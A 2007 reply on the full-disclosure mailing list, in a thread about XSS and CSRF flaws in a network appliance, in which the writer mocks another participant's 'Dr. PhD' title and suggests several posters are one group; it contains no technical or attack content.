Date: Wed, 27 Jun 2007 23:52:36 +0100
From: "Pete Simpson" <Pete.Simpson@...arswift.com>
To: "Dr. Neal Krawetz PhD" <neal@...wetz.org>, "pagvac"
	<unknown.pentester@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Persistent XSS and CSRF on network
 appliance[subject corrected :) ]

I haven't followed all of this rather strange thread, but I wonder if
n_td_v, gobble_ and the venerable Doctor may be one and the same group?
After all few educated individuals would be likely to be so pretentious
as to declare themselves as both Dr and PhD? As if we might confuse the
guy, on this list with a doctor of medicine or a doctor of divinity or a
witch doctor? Odd.